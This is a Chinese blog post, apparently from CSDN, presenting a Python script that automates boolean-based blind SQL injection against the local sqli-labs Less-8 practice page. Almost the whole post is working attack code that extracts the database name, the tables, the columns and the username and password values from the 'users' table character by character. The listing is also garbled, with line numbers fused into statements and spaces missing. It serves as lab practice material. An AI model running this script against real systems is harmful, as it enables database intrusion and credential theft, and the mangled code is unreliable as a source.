python脚本自动化盲注_基于布尔的盲注入python脚本

最新推荐文章于 2022-12-28 11:18:36 发布

毅燃君

最新推荐文章于 2022-12-28 11:18:36 发布

阅读量317

点赞数

文章标签： python脚本自动化盲注

本文链接：https://blog.csdn.net/weixin_32256861/article/details/112964654

版权

该Python脚本用于自动化执行SQL盲注攻击，通过发送HTTP请求，利用布尔响应判断来确定数据库名、表名、字段名以及特定值。脚本首先通过尝试不同长度来获取数据库名，然后逐字符获取数据库名、表名、'users'表中的字段名以及'users'表中'username'和'password'字段的值。

摘要由CSDN通过智能技术生成

1 #coding:utf-8

2 importrequests3

4 #获取数据库名长度

5 defdatabase_len():6 for i in range(1, 10):7 url = '''http://127.0.0.1/sqli-labs/Less-8/index.php'''

8 payload = '''?id=1' and length(database())>%s''' %i9 #print(url+payload+'%23')

10 r = requests.get(url + payload + '%23')11 if 'You are in' inr.text:12 print(i)13

14 else:15 #print('false')

16 print('database_length:', i)17 break

20 database_len()21

22 #获取数据库名

23 defdatabase_name():24 name = ''

25 for j in range(1, 9):26 for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':27 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" %(28 j, i)29 #print(url+'%23')

30 r = requests.get(url + '%23')31 if 'You are in' inr.text:32 name = name +i33

34 print(name)35

36 break

37 print('database_name:', name)38

40 database_name()41

42 #获取数据库表

43 deftables_name():44 name = ''

45 for j in range(1, 30):46 for i in 'abcdefghijklmnopqrstuvwxyz,':47 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" %(48 j, i)49 r = requests.get(url + '%23')50 if 'You are in' inr.text:51 name = name +i52

53 print(name)54

55 break

56 print('table_name:', name)57

59 tables_name()60

62 #获取表中字段

63 defcolumns_name():64 name = ''

65 for j in range(1, 30):66 for i in 'abcdefghijklmnopqrstuvwxyz,':67 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" %(68 j, i)69 r = requests.get(url + '%23')70 if 'You are in' inr.text:71 name = name +i72

73 print(name)74

75 break

76 print('column_name:', name)77

79 columns_name()80

82 #获取username

83 defusername_value():84 name = ''

85 for j in range(1, 100):86 for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':87 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" %(88 j, i)89 r = requests.get(url + '%23')90 if 'You are in' inr.text:91 name = name +i92

93 print(name)94

95 break

96 print('username_value:', name)97

99 username_value()100

101

102 #获取password

103 defpassword_value():104 name = ''

105 for j in range(1, 100):106 for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':107 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" %(108 j, i)109 r = requests.get(url + '%23')110 if 'You are in' inr.text:111 name = name +i112

113 print(name)114

115 break

116 print('password_value:', name)117

118

119 password_value()